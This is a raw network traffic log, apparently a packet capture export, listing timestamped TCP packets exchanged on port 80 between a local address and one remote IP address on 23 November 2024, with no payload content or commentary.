                                                                                                                                                                                                Nov 23, 2024 16:53:31.952406883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.952466965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.952511072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.952558994 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.953167915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.953286886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.953598976 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.953908920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.954041958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.954648018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.954709053 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.954751968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.954802036 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.955445051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.955488920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.956115961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.956172943 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.956254005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.956300974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.956850052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.957000971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.957619905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.957680941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.957797050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.958342075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.958411932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.958496094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.958539963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.959045887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.959177971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.959815025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.959876060 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.959935904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.959983110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.960544109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.960608006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.961266994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.961324930 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.961390972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.961441994 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.961991072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.962129116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.962210894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.962749004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.962862968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.963474035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.963536978 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.963624954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.963665962 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.964272022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.964344025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.964984894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.965044975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.965090990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.965136051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.965691090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.965785980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.966166973 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.966438055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.966547012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.967159033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.967235088 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.967307091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.967354059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.967926979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.968045950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.968646049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.968703032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.968765020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.968812943 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.969371080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.969510078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.969578981 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.970181942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.970273018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.970854998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.970913887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.970966101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.971012115 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.971599102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.971681118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.972338915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.972397089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.972446918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.972496033 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.973086119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.973212957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.973515987 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.973803997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.973933935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.974636078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.974700928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.974752903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.974801064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.975279093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.975378990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.976017952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.976073980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.976133108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.976180077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.976769924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.976876020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.977490902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.977544069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.977590084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.977638006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.978240013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.978338957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.978427887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.978956938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.979087114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.979688883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.979743004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.979826927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.979875088 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.980436087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.980564117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.981215954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.981270075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.981323957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.981384039 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.981906891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.982038021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.982656002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.982722044 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.982768059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.982811928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.983402967 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.983490944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.984131098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.984189987 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.984241962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.984287977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.984905958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.984982967 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.985579014 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.985618114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.985713005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.986438036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.986485004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.986511946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.986558914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.987097979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.987214088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.987839937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.987890959 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.987946987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.987993956 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.988569021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.988673925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.989329100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.989389896 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.989447117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.989494085 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.990046024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.990183115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.990731955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.990770102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.990911007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.991517067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.991568089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.991620064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.991667032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.992307901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.992444038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.992988110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.993046999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.993105888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.993153095 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.993719101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.993834972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.994471073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.994533062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.994590998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.994640112 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.995225906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.995349884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.995949984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.996012926 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.996057034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.996110916 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.996690035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.996789932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.997452974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.997526884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.997536898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.997579098 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.998181105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.998229027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.998284101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.999051094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.999172926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.999623060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.999630928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:31.999769926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:31.999820948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.000349045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.000495911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.001097918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.001168966 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.015727997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.015784025 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.015886068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.016068935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.016199112 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.016204119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.016566038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.016705036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.016766071 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.017335892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.017379999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.017398119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.018059015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.018263102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.018333912 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.018899918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.018937111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.018955946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.019525051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.019650936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.019711018 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.020270109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.020327091 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.020369053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.020989895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.021064997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.021120071 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.021719933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.021823883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.021883011 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.022473097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.022547960 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.022666931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.023220062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.023334980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.023390055 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.023941994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.024000883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.024044037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.024682045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.024842978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.024899960 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.025435925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.025485992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.025496960 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.026218891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.026302099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.026360989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.026881933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.026936054 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.026985884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.027635098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.027756929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.027812958 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.028362989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.028413057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.028496981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.029093981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.029227018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.029282093 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.029865980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.029891014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.029948950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.030574083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.030621052 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.030673027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.031327963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.031426907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.031482935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.032027960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.032078028 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.032155037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.032799006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.032892942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.032946110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.033606052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.033629894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.033690929 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.034270048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.034341097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.034399986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.035001993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.035121918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.035181046 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.064047098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.064064026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.064131975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.064318895 CET8049744185.215.113.16192.168.2.4
